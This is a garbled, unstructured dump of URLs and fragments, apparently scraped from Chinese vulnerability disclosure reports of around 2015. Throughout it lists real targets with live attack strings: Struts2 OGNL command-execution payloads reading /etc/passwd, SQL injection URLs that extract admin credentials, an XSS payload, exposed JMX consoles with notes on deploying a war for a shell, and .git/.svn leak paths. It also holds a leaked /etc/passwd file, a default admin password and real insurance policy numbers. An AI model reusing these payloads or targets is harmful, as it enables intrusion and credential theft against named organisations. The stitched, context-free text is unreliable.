www.lillyoncology.com.cn","time_add":"2015-03-11 www.lillyoncology.com.cn","glabel":"礼来国际","group_id":23,"domain_id":32,"errmsg www.sunflowerclub.com.cn","time_add":"2015-03-11 www.sunflowerclub.com.cn","glabel":"礼来国际","group_id":23,"domain_id":33,"errmsg www.huadong.cn","time_add":"2015-03-11 www.huadong.cn","glabel":"上海华东人才","group_id":30,"domain_id":38,"errmsg www.niwodai.com","time_add":"2015-03-11 www.niwodai.com","glabel":"默认","group_id":1,"qtype":"A","domain_id":4,"time_total":13.463 www.louisfenysh.com","time_add":"2015-03-11 www.louisfenysh.com","glabel":"上海欧睛","group_id":60,"qtype":"A","domain_id":77,"time_total":10.156 www.huadong.net.cn","time_add":"2015-03-11 www.huadong.net.cn","glabel":"上海华东人才","group_id":30,"domain_id":39,"errmsg http://git2.qingtingfm.com//public/projects http://wooyuntest.net3v.net http://monitor.cloud.chinacache.com/admin/ 
http://monitor.cloud.chinacache.com/ipmonitor/vm_console http://www.duimian.cn/ucenter/uaddress http://114.80.155.61:8080/pos/spif/login.jsp http://114.80.155.61:8080/admin-console http://www.nongyou.com.cn/ http://jwh.tanljgzx.gov.cn/newsymItemView/Item1.aspx?id=021973 http://218.56.99.84:8003/newsymItemView/Item1.aspx?id=066968 http://222.135.109.70:8200//newsymItemView/Item1.aspx?id=021973 http://123.134.189.60:8022//newsymItemView/Item1.aspx?id=021973 http://218.56.40.229:8037//newsymItemView/Item1.aspx?id=021973 http://jwh.tanljgzx.gov.cn/ckq/szglview.aspx?id=3940 http://218.59.205.41:8053/ckq/szglview.aspx?id=3940 http://218.59.205.41:8053/ckq/szgllistview.aspx?tname=%E7%8E%8B%E5%BA%84%E9%95%87&CountryName=%E5%8D%97%E5%B0%9A%E4%B8%9C http://jwh.tanljgzx.gov.cn//ckq/szgllistview.aspx?tname=%E7%8E%8B%E5%BA%84%E9%95%87&CountryName=%E5%8D%97%E5%B0%9A%E4%B8%9C http://work.ch.gongchang.com/login.html http://p.dahe.cn/index.php?r=user/login这个接口,是大河网站的一个分站登陆接口,可以看到登陆地方没有任何限制 http://wmcrm.baidu.com/ http://www.wanshe.cn/login/toGet_password www.wanshe.cn https://member.meizu.com http://www.yonghe.com.cn/index.php/Index/newsdetail/id/33* http://www.yonghe.com.cn/index.php/Index/newsdetail/id/33* http://218.108.48.210/kucun/login.php http://mail.10086.cn http://114.80.217.165:8080/XWSpnetWai/share/login/pages/Login.jsp http://114.80.217.165:8080/jmx-console/ http://star.cms.qingting.fm/ url:http://sso.cqpost.com/normal/main.jsp http://weibotest.gfan.com/dz/ inurl:http://www.chinalife.com.cn/online/propertyPolicy/findPolicyDetail.do?mobileOrWY=0&policyNo= http://www.chinalife.com.cn/online/propertyPolicy/findPolicyDetail.do?mobileOrWY=0&policyNo=805072014370397001779&insuranceType=0&identifyNumber=79270613-1&addressCode=37000000&printNo=undefined&insuranceName=undefined 
http://www.chinalife.com.cn/online/propertyPolicy/findPolicyDetail.do?mobileOrWY=0&policyNo=805072014330212003938&insuranceType=0&identifyNumber=05509836-7&addressCode=33020000&printNo=undefined&insuranceName=undefined http://210.31.114.125/kfWeb/admin/admin_adminmodifypwd.aspx http://www.lzc.com.cn/ http://**.**.**/edoas2/login.jsp http://cms.qingting.fm/ http://sports.cms.qingting.fm/ http://www.qzdatasoft.com/ http://jw.jzu.edu.cn/jiaowu/jwgl/LoginCheck4.asp?LoginLb=jwc&Account=1 http://jiaowu.jljcxy.com/jiaowu/jwgl/LoginCheck4.asp?LoginLb=jwc&Account=1 http://jiaowu.tedazj.com/jiaowu/jwgl//LoginCheck4.asp?LoginLb=jwc&Account=1 http://111.177.117.72/jiaowu_xflg/jwgl/LoginCheck4.asp?LoginLb=jwc&Account=1 http://jwgl.cqeec.com/jiaowu_2008/jwgl/LoginCheck4.asp?LoginLb=jwc&Account=1 https://www.tuandai.com/ajaxCross/Login.ashx www.tuandai.com http://222.78.53.226/LpInfo/nm_4_155.html?dtid=587&fwUse=%E5%BA%97%E9%9D%A2 http://tstz.fdc.cn/LpInfo/nm_4_211.html?dtid=&fwUse=%E8%BD%A6%E4%BD%8D http://www.dsfgj.cn/LpInfo/nm_4_326.html?dtid=&fwUse=%E5%95%86%E5%9C%BA http://ptjs.zzjs.cn/LpInfo/nm_4_148.html?dtid=1119&fwUse=%E5%95%86%E4%BD%8F%E6%A5%BC http://www.tstzfdc.gov.cn/LpInfo/nm_4_161.html?dtid=666&fwUse=%E8%BD%A6%E5%BA%93 http://www.xcola.com.cn/ http://222.73.136.205/ http://115.29.221.110/ http://210.13.199.11/ http://118.144.36.61/ http://221.8.23.119/jyb-zhongzhi/ http://login.alpha.p7game.com/index/passportLogin/USER/PASS http://bbs.zol.com.cn/dcbbs/d232_760115_8.html http://drops.wooyun.org/tips/689 http://bbs.zol.com.cn/dcbbs/d17_54716_16.html http://git.social-touch.com/public http://old.jiajia.me/login这个登陆接口是老版的,一开始我进的是新版的登陆接口,但是我看的新版的那个登陆接口是有验证码限制,没有试可不可以绕过直接就到了这个接口,发现这个接口是没有任何登陆限制的,果然老版安全做的不如新版好 http://weixin.51web.com/LoginAction!logout.action这个接口是成都世纪东方微信公众平台管理的登陆接口,打开后看到是有验证码限制的 http://www.jlsbdsystem.com/ http://111.12.219.18/Login.aspx http://jingzhi.jd.com/中的消息处,用户能够越权删除其他用户的消息,而且是get,fuzz都能够删除完整站用户的消息 
http://wap.kaixin001.com/auth/?appkey=4981162124136a074769f1078676fdb2&flag=2&_email=bklm11&display=&iswebgame=0&from=kx&callback=http%3A%2F%2Fapi.kaixin001.com%2Foauth2%2Fauthorize%3Fclient_id%3D4981162124136a074769f1078676fdb2%26response_type%3Dcode%26scope%3Dbasic+friends_records+user_education+user_career+send_sysnews+create_records%26state%3Da79df608262f06cac21c8166733ecb65c09a1f5f%26redirect_uri%3Dhttp%253A%252F%252Fm.dajie.com%252Faccount%252Fkx%252Fcallback%253Fcb%253D0%26oauth_client%3D1%26display%3Dmobile%26tmp%3D1%26oauth_client%3D1&return=&isoauth=1 http://www.sem-cms.com/ http://www.themenunique.com/N_view.asp?nid=2 http://www.qdlmesh.com/N_view.asp?nid=15 http://www.minrida.com/N_view.asp?nid=113 http://www.keytron.com.hk/N_view.asp?nid=16 http://sevistec.com/N_view.asp?nid=11 http://www.sem-cms.com/ http://www.yikai-auto.com/clkj_admin/upfile.asp http://progloballight.com/clkj_admin/upfile.asp http://www.1dragon.net/clkj_admin/upfile.asp http://www.stdfled.com//clkj_admin/upfile.asp http://www.apexcool.com/clkj_admin/upfile.asp http://passport2.chaoxing.com/register3?refer=http%3A%2F%2Fi.mooc.chaoxing.com http://ir.moxian.com http://yxhk.mxcms.moxian.com http://customer.yxhk.moxian.com http://ir.moxian.com http://ptr.chaoxing.com/coursecontroller/factors?newCourse=true http://admin.tuchong.com data.zjepi.net/ZheJiang/systemsetting/userLogin.action_ http://**.**.**/YangZhou/__ http://**.**.**/RiZhao/_ http://**.**.**/DeZhou/_ http://**.**.**/HeZe/_ http://**.**.**/LiaoCheng/_ http://**.**.**/LaiWu/_ http://**.**.**/BinZhou/_ http://**.**.**/loginAction!login.action;jsessionid=28048FFB8F1DC457070CFC24BF6D185B http://219.143.38.248/paycenter/ http://219.143.38.248/DeliveryCenter/login.do?email= http://sharpshooter.yesky.com/userAction_toLogin.action IP:219.239.88.230 Port:11211 http://ad.zuiyouxi.com http://zdq.zuiyouxi.com http://my.webluker.com/user/check_port/ http://act.duimian.cn/login/submit http://120.236.40.70/ http://120.236.40.72/ 
http://120.236.40.76/ http://120.236.40.69/ http://120.236.40.75/ http://120.236.40.73/ http://120.236.40.77/ http://trade.315.com.cn/web/tradeAction_industryUI.html?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 http://124.42.9.93 http://124.42.9.90 http://cjcx.nsjy.com/ccpro/view/score/examAction!userLogin.action存在命令执行漏洞 https://www.labi.com/resetPwdByPhone?step=1 http://www.labi.com/passport/resetPwd http://passportm.linekong.com/epassport_mid/xmlRpcServerServlet http://yt.linekong.com/adCount.php?mid=@1,http://hero.linekong.com/adCount.php?mid=@2,http://ss.linekong.com/adCount.php?mid=@3,http://xy.linekong.com/adCount.php?mid=@4,http://dxxd.linekong.com/adCount.php?mid=@7,http://yb.linekong.com/adCount.php?mid=@508,http://yb.linekong.com/adCount.php?mid=@8,http://yt2.linekong.com/adCount.php?mid=@10,http://xz.028yx.com/adCount.php?mid=@749,http://fr.linekong.com/adCount.php?mid=@750,http://ms.linekong.com/adCount.php?mid=@513,http://rx.linekong.com/adCount.php?mid=@11,http://ms.linekong.com/adCount.php?mid=@13,http://tx.028yx.com/adCount.php?mid=@15,http://kx.linekong.com/adCount.php?mid=@509,http://www.huoying.com/adCount.php?mid=@16,http://msz.028yx.com/adCount.php?mid=@774 http://www.linekong.com/adCount/show.php?mid=@1,http://www.linekong.com/adCount/show.php?mid=@2 http://www.linekong.com/adCount/show.php?mid=@3,http://www.linekong.com/adCount/show.php?mid=@4 http://59.151.39.186/common/interface/xmlrpc.php 
http://**.**.**/complaintCenter/portal/jsp/portal/index.jsp 300.cn/liyun@300.cn http://bx.315.com.cn/ http://bx.315.com.cn/mysql/index.php http://3g.happigo.com/default.php?mod=user&act=login这个接口,快乐购物的3g登陆接口,可以看到登陆的地方是有验证码限制的 http://www.labi.com http://www.labi.com/groups/ http://www.labi.com/groups/1930/feeds http://www.labi.com/groups/1930%20and%201=2%20union%20select%201,2,3,user%28%29,5,6,7,8,9,10,11/contacts/1 http://119.254.100.43/index/index.html http://www.wankr100.com/ http://common.hao123.com/comment/yingshizhuanti_tieba/list?item_id=20150505789&frame=7&tpl=index_co_tieba&width=958&page=2 http://www.flyrise.cn/ http://oa.shunhengli.com:9090/fenc/syncsubject.jsp?pk_corp=1 http://oa.chnjcdc.com:9090/fenc/syncsubject.jsp?pk_corp=1 http://218.90.146.246:9090/fenc/syncsubject.jsp?pk_corp=1 http://119.97.198.27:8080/fenc/syncsubject.jsp?pk_corp=1 http://124.129.26.94:7742/fenc/syncsubject.jsp?pk_corp=1 http://oa.shunhengli.com:9090/indexsearch/filter.jsp?tableId=1 http://119.97.198.27:8080/indexsearch/filter.jsp?tableId=1 http://zszhongyou.gicp.net:9090//indexsearch/filter.jsp?tableId=1 http://218.90.146.246:9090/indexsearch/filter.jsp?tableId=1 http://124.129.26.94:7742/indexsearch/filter.jsp?tableId=1 http://fe.hy-la.com:8088/flex/newsmessage.jsp?uname=1 http://oa.chnjcdc.com:9090/flex/newsmessage.jsp?uname=1 http://oa.suncorps.cn/flex/newsmessage.jsp?uname=1 http://www.kwh.org.mo:4040/flex/newsmessage.jsp?uname=1 http://183.57.22.222:9090/flex/newsmessage.jsp?uname=1 http://oa.chnjcdc.com:9090/feReport/chartList.jsp?delId=1&reportId=1 http://fe.hy-la.com:8088/feReport/chartList.jsp?delId=1&reportId=1 http://oa.suncorps.cn/feReport/chartList.jsp?delId=1&reportId=1 http://124.129.26.94:7742/feReport/chartList.jsp?delId=1&reportId=1 http://oa.shunhengli.com:9090/feReport/chartList.jsp?delId=1&reportId=1 http://admin.sbxq.51wan.com http://mp.linekong.com/login/login.do root:x:0:0:root:/root:/usr/local/bash/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin 
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin euosmonitor:x:500:500::/home/euosmonitor:/usr/local/bash/bin/bash gm:x:501:501::/home/gm:/usr/local/bash/bin/bash jboss:x:502:502::/home/jboss:/usr/local/bash/bin/bash msvr:x:503:503::/home/msvr:/usr/local/bash/bin/bash rating:x:504:504::/home/rating:/usr/local/bash/bin/bash rating4lh:x:505:505::/home/rating4lh:/usr/local/bash/bin/bash yyecharging:x:506:506::/home/yyecharging:/usr/local/bash/bin/bash puppet:x:52:52:Puppet:/var/lib/puppet:/sbin/nologin zabbix:x:507:507::/:/sbin/nologin eadmobile:x:508:508::/home/eadmobile:/usr/local/bash/bin/bash http://passportm.linekong.com/epassport_mid/xmlRpcServerServlet 
http://mp.linekong.com http://tdl01.8864.com/lkcps/ http://passportm.linekong.com/epassport_mid/xmlRpcServerServlet jdbc:oracle:oci:@DB_BI jdbc:oracle:oci:@DB_BI http://mp.linekong.com/myname/m.jsp http://youhui.aibang.com/?area=discount&cate=医院%27%20and%20ascii%28mid%28user%28%29,8,1%29%29=49%20and%20%271%27=%271&city=chengdu http://www.zjwsjd.com/display.asp?id=1776 http://www.zjwsjd.com/manager/login.asp http://www.lilywed.cn/tips-11/ http://newadmin.newman.mobi http://103.227.78.174:9001/.git/config http://103.227.78.174:6001/.git/config http://103.227.78.174:4001/.git/config http://103.227.78.174:10001/.git/config http://119.90.53.167:9999/.git/config http://auth.yunshanmeicai.com/.git/config http://bi.yunshanmeicai.com/.git/config http://crm.yunshanmeicai.com/.git/config http://online.yunshanmeicai.com/.git/config http://pms.yunshanmeicai.com/.git/config http://stage.yunshanmeicai.com/.git/config http://supply.yunshanmeicai.com/.git/config http://test.yunshanmeicai.com/.git/config www.maomaogo.com http://inno.ruc.edu.cn/DS/overviewBulletinArticle http://inno.ruc.edu.cn/DS/overviewBulletinArticle?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D https://graph.renren.com/oauth/grant http://graph.renren.com http://chinastudies.ruc.edu.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=111 
http://12580wap.10086.cn/wap5/user!lry.do http://xuegong.stiei.edu.cn:9093/ZS/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp http://xuegong.stiei.edu.cn:9091/framework/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp http://xg.shcc.edu.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp http://202.38.64.67/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp http://career.sspu.edu.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp/editor/filemanager/browser/default/browser.html?Type=File&Connector=../../connectors/asp/connector.asp http://www.xb.uestc.edu.cn/nature/index.php?cid=374%20AND%201=2%20UNION%20SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28select%20user%28%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%20-- http://121.10.6.161:8080/jnjdbm/xgrptwo/index.jsp http://napos.ele.me/login http://www.shjcy.gov.cn:9112/platform/integratedServices.jsp http://www.shjcy.gov.cn:9112/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://220.196.57.132/index.php?wcode=0000&xcode= http://www.docin.com/jsp_cn/login/docincon.jsp这个接口可以看到接口没有任何限制的 http://doc.vlinkage.com/pma/ http://base.vlinkage.com/pma/ http://202.55.1.29:8000/ 
http://www.gbdjyw.cn/manager/db/ http://www.m6go.com/my/GetBabyInfoById.do?babyid=19682 http://www.m6go.com/my/GetBabyInfoById.do?babyid=19681试试 http://www.m6go.com/my/GetBabyInfoById.do?babyid=1~1982 http://www.xiaozhu.com http://123.232.105.202/ http://erp.suning.com.cn/ http://115.238.57.245/ http://erp.suning.com.cn/uapws/service http://www.sylsw.com/show_house.php?id=151 http://210.38.128.68:8080/ http://210.38.128.68:8080/invoker/JMXInvokerServlet部署war拿shell http://www.hp1997.com/MyCenter/forgetpassUp.aspx http://www.520wqk.com/loginOut.do http://adx.toutiao.com/ http://bgp.cnpc.com.cn/ http://114.251.197.145/ http://114.251.197.149/eps/eps/system/login/login.jsp http://114.251.197.225/eps/system/login/login.jsp http://wooyun.org/bugs/wooyun-2010-082227 http://baike.baidu.com/link?url=cBbo8NVeLHjoio2AL80CZn3RDw-66FcMGU3cc30y7x29cLZFV_wh8XIe-2hDASdQcW8ZmBCvMgQ099aAWGZqeh9VmoRC7MJdK8TjZnmXgQY_EZPPWd4EB_ggDlsbvgFeSfCtFn_CrQibi_xmphlFWQnL51AchltJGhfljnaOuQsHO4x8oeiADRuOr2_gH1I9 http://wsyc.fengshun.cc/admin/ks.htm http://shouji.baidu.com/software/item?docid=5314392&from=as&f=item%40content_bottom_rec%401 http://ask.ci123.com/questions/show/1283372,这是我的提问,http://ask.ci123.com/questions/show/1283372,删除操作, http://123.127.217.117:8080/ThamsWeb/thamsxp/index.htm http://123.127.217.117:8080/jmx-console/ http://123.127.217.117:8080/invoker/JMXInvokerServlet http://58.68.229.116/api/sum_bandwidth_dianxin_xml http://www.sc.hrss.gov.cn/scrswebdongtai/consult/findAll?reply_state=4&consult_type=1&pageSize=6&pageNumber=1 http://video.sdo.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://oa.vlinkage.com/pma/ http://lnjoa.vicp.net:88/defaultroot/public/select_user/search_org_list.jsp?searchName= http://222.178.221.54:7001/defaultroot/public/select_user/search_org_list.jsp?searchName= 
http://58.221.210.116:7001/defaultroot/public/select_user/search_org_list.jsp?searchName= http://oa.orionww.com:7001/defaultroot/public/select_user/search_org_list.jsp?searchName= http://125.95.19.222:7001/defaultroot/public/select_user/search_org_list.jsp?searchName= www.venustech.com.cn/Login.aspx这个接口,是启明星辰主站登陆的接口,可以看到登陆的地方没有任何限制 http://xsc.cqupt.edu.cn/xsc/admin/index.php/login http://**.**.**/ http://wap.sogou.com http://wap.sogou.com/web/searchList.jsp payload:http://wap.sogou.com/web/searchList.jsp?uID=VxJn8XT7ZWCaznT5&v=5&w=1278&t=1431058749585&s_t=1431058756606&keyword=\%27%3Balert%28document.domain%29%3B%3C!--&pg=webSearchList&s= http://admin.qupeiyin.cn/Weixin/test/share?study_show_id=1 http://admin.qupeiyin.cn/Weixin/test/dubbing?course_id= http://www.ceboss.cn/SalesManager/portal/jsp/portal/index.jsp xinnet.com/liyun@xinnet.com http://onlineexam.tnua.edu.tw/schedule.jsp?&recrid=003&recrm=05 ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** ftp://**.**.** http://s.weibo.com/user/&work=%25E4%25BB%258A%25E6%2597%25A5%25E5%25A4%25B4%25E6%259D%25A1 http://www.ghj.anshun.gov.cn/index.asp http://222.86.132.21/admin/upload.asp http://120.132.149.46:8080/meeting/usRegister/userLogin.action存在命令执行漏洞 http://120.132.149.46:8080/meeting/2.jsp http://mem.tsinghua.edu.cn/shownews.asp?news_id=48 http://ugctest.qupeiyin.cn:8084/.svn/entries http://mail.ename.com https://r.webnic.cc/index.jsp 63.com/ID***** http://kh.zuiyouxi.com:8888/ http://myt.51wan.com/.svn/entries http://hdt.51wan.com/.svn/entries http://usert.51wan.com/.svn/entries http://gg.51wan.com/.svn/entries http://www.lnsstzx.com:9999/ThamsWeb/thamsxp/ 
http://www.lnsstzx.com:9999/jmx-console http://www.lnsstzx.com:9999/jmx-console部署了wooyun.war http://x.x.x.x/seatListSelect.jsp http://x.x.x.x/ucstarMessage-list-new.jsp http://x.x.x.x/webcall/messageNoteAdd.jsp http://mail.gjqh.com.cn:9090/ucstarMessage-list-new.jsp https://**.**.**/RyanTech/csp http://www.dlqx.gov.cn/admin/vote/manage.jsp http://www.hsort.com/ http://zsjggw.xnu.edu.cn/ http://p.hsort.com/ https://rt-express.com/rt_home/en/ogru_index.html https://rt-express.com/rt_home/rb2/rtf/getRt1Rtf.php?trackNum= http://210.73.44.57:8080/HYDJ/control/main http://210.73.44.57:8080/jmx-console/ http://m.feiniu.com http://test.my.gfan.com/.svn/entries http://118.112.188.6:8040/ThamsWeb/thamsxp/index.htm http://118.112.188.6:8040/jmx-console/ http://118.112.188.6:8040/upload5warn/shell.jsp http://m.jiuxian.com/ http://m.jiuxian.com/m_v1/user/getpwd http://news.ifeng.com/a/20150508/43716946_0.shtml http://tempuri.org/GetDeviceList soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://tempuri.org/ soap:Body soap:Envelope www.zjggjj.gov.cn/EpointBigFileUpload/xm.asp;jpg www.zjginvest.gov.cn www.zjgfh.gov.cn www.njdjh.com www.jcid.com.cn www.gtfdc.com.cn www.siyangtour.com www.ntkfqztb.cn www.zgysbwg.com www.xn--fiQz9J1qDmuXfyA876Bvs8D.net www.epoint.com.cn www.jsntzj.com www.wzqzgh.org www.fhzbmfw.gov.cn www.jsncpjjr.cn www.ymip.com www.jf.zjg.gov.cn www.synyjq.com www.xn--6kR66F.net www.zjgsf.gov.cn www.zjggjj.gov.cn www2.zjggjj.gov.cn www.ccade.org www.zjggjj.gov.cn http://101.227.2.70/admin.zip http://101.227.2.70/adminsites/test.php http://thor.tongbanjie.com/auth/login http://wenku.baidu.com/view/420413efb84ae45c3b358c91.html http://cmbchina.allyes.com/megagame_detail.php?id=418 http://www.51tek.com/category-384.html http://jpkc.lut.cn/ http://wyjpk.whu.edu.cn/ http://jpk.squ.net.cn http://jp.ycvc.jx.cn/ http://jpkc.huanghuai.edu.cn/ 
http://youxuan.homeinns.com/Address/UpdateDefaultaddress?id=*****&userid=******* Referrer:http://youxuan.homeinns.com/Address/SelectAddress?FromType=0 http://refer.medlive.cn/control/record.inc.php?action=search&full_name= http://m.vvipone.com/h5/login.html http://csc.zte.com.cn/CALLCENTER/Application/SystemManage/Tlogon.aspx http://csc.zte.com.cn/CALLCENTER/Application/SystemManage/Tlogon.aspx http://xj.digitalchina.com http://xj.digitalchina.com/system/user/add.jsp http://xj.digitalchina.com/system/user/addCustomerInfo.jsp http://xj.digitalchina.com/system/user/updatepass.jsp http://xj.digitalchina.com/system/user/list.jsp http://xj.digitalchina.com/system/role/add.jsp http://xj.digitalchina.com/system/role/list.jsp http://xj.digitalchina.com/system/menu/menu.jsp http://xj.digitalchina.com/system/company/add.jsp http://xj.digitalchina.com/system/role/.svn/text-base/add.jsp.svn-base http://xj.digitalchina.com/system/role/.svn/text-base/list.jsp.svn-base http://xj.digitalchina.com/system/company/.svn/text-base/addNew.jsp.svn-base http://xj.digitalchina.com/system/company/.svn/text-base/edit.jsp.svn-base http://xj.digitalchina.com/system/company/.svn/text-base/list.jsp.svn-base http://xj.digitalchina.com/system/citymanage/.svn/text-base/addcity.jsp.svn-base http://xj.digitalchina.com/system/citymanage/.svn/text-base/addcityIsOut.jsp.svn-base http://xj.digitalchina.com/system/citymanage/.svn/text-base/citylist.jsp.svn-base http://spam.fesco.com.cn/view/rePassword!sendMail.action http://spam.fesco.com.cn/view/login!login.action http://183.223.250.82:81/usercfg/user_loginUI.do http://223.87.12.193/usercfg/user_loginUI.do http://218.27.126.215/usercfg/user_loginUI.do http://60.255.46.54/usercfg/user_loginUI.do http://222.169.193.162/usercfg/user_loginUI.do username:admin password:123456 http://top.digitalchina.com/chat/chat/admin/addUser.jsp http://top.digitalchina.com/chat/chat/admin/editUser.jsp 
http://top.digitalchina.com/chat/chat/admin/myAdmin.jsphttp://top.digitalchina.com/chat/chat/admin/userList.jsp http://top.digitalchina.com/chat/chat/service/myServiceMain.jsp http://top.digitalchina.com/chat/chat/service/myService.jsp http://kaiyuan.hudong.com:80/download.php?n=HDWiki-v4.0.2GBK-20081106.zip&refer=1 http://fw.rrs.com/snaplb/Wiki/Search/list?pageNum=1&pageSize=10&moduleId=2 http://fw.rrs.com/snaplb/CMS/Search/list?pageNum=1&pageSize=4&modelId=1 http://fw.rrs.com/snaplb/FAQ/FAQList?tLevel=33480a48-0f72-489a-b209-16a7e0331634&pageNum=1&pageSize=5 http://dcncs.digitalchina.com http://dcncs.digitalchina.com/database/数据库的目录,都可以下载下来,我这里没有下载你们的数据,我只不过友情检测一下!没有做任何的破坏,谢谢! http://dcncs.digitalchina.com/log/ http://**.**.**/bugs/wooyun-2010-0105760 http://**.**.**/ http://**.**.** http://59.151.117.186:7001/Login.aspx http://luanshiqu.playcrab.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,10%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://luanshiqu.playcrab.com/lsq/login.php http://cy.playcrab.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,10%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://cy.playcrab.com/zzjs/login.php http://qilongzhu.playcrab.com/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,10%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 
